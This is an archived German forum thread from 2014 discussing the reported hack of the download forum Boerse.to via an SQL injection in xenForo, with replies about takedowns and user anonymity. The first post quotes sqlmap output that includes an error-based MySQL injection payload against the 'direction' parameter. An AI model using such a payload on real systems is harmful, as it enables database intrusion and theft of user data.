Vollständige Version anzeigen : Boerse.to gehackt - Anonymität fehlanzeige!


tarnkappe.
24.10.2014, 15:33

Nach Auskunft des Threaderstellers bei SzeneBin bestand oder besteht in der Forensoftware xenForo eine Sicherheitslücke, die von ihm mithilfe einer SQL Injection ausgenutzt werden konnte. Gestern Nachmittag wurde zudem veröffentlicht, welche Plug-ins bei Boerse~to installiert sind. Wie es aussieht, hatten die Hacker offenbar Vollzugriff auf das Forum.

anonymität von wegen..

sqlmap identified the following injection points with a total of 99 HTTP(s) requests:
---
Place: POST
Parameter: direction
Type: error-based
Title: MySQL >= 5;1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)
Payload: direction=,EXTRACTVALUE(3929,CONCAT(0x5c,0x7171646c71,(SELECT (CASE WHEN (3929=3929) THEN 1 ELSE 0 END)),0x7178667471))
---
back-end DBMS: MySQL >= 5;0;0
Database: xenboerse




Quelle:
boerse~to hacked by 404 + cyber agent | hinter den kulissen - SzeneBin News - SzeneBin (;szenebin~org/index;php/Thread/221-boerse-to-hacked-by-404-cyber-agent-hinter-den-kulissen/?postID=1021#post1021)
Tarnkappe~info (;tarnkappe~info/boerse-gehackt/)

Hardware Preisvergleich | Amazon Blitzangebote!

Videos zum Thema
Video Loading...
Carla Columna
24.10.2014, 15:50

Scheinbar hat boerse~to auch keine Bot-Schutz for DMCA-Scannern oder vereinfachen es!? Denn viele Uploads sind dort deutlich schneller off als vorher, auch alte Sachen die lange on waren sind seit dem "Backup" deutlich weniger geworden.

Das wirft natürlich auch Spekulationen auf über die Finanzierung und den "GoodWill" hinter dem Projekt.


fatmoe
25.10.2014, 12:33

Wer denkt im Netz ist man ohne eigene Vorsichtsmaßnahmen sicher, glaubt eh an den Weihnachtsmann!

Mal wieder viel Aufregung um nix im Endeffekt.


Ähnliche Themen zu Boerse.to gehackt - Anonymität fehlanzeige!
  • http://www.boerse.bz
    hi, ich kann mich einfach nicht bei der seite einloggen.. BoerseBZ (;;;boerse~bz) hat jmd. ne idee woran es liegen koennte? bzw was man dagegen machen koennte? oder hat jemand nen acc den ich mit benutzen koennte? bw ist sicher mfg [...]

  • Boerse.BZ eXploited
    An einem Morgen saß ein Rabe mit einem gestohlenen Stück Käse im Schnabel auf einem Ast, wo er in Ruhe seine Beute verzehren wollte. Zufrieden krächzte der Rabe über seinen Käse. Dies hörte ein vorbei ziehender Fuchs. Er dachte nach, wie er an den Käse kommen könnte. Endlic [...]

  • boerse.bz down
    hi, boerse~bz ist grade down, es erscheint nur: Page not available. Contact the administrator. weiss jemand was darüber? [...]

  • Flirtbörse der rechten Szene gehackt (Thor Steinar auch gehackt)
    Flirtbörse der rechten Szene gehackt 39067 (;;;bilder-hochladen~net/files/29xh-2-png;html) Hacker aus dem Umfeld des 26. Chaos Communication Congress (26C3) in Berlin haben sich Zugang zur kompletten Datenbank hinter der Partnersuchseite "MA Flirt" verschafft und diese samt Nutzerdaten und P [...]



raid-rush.ws | Imprint & Contact pr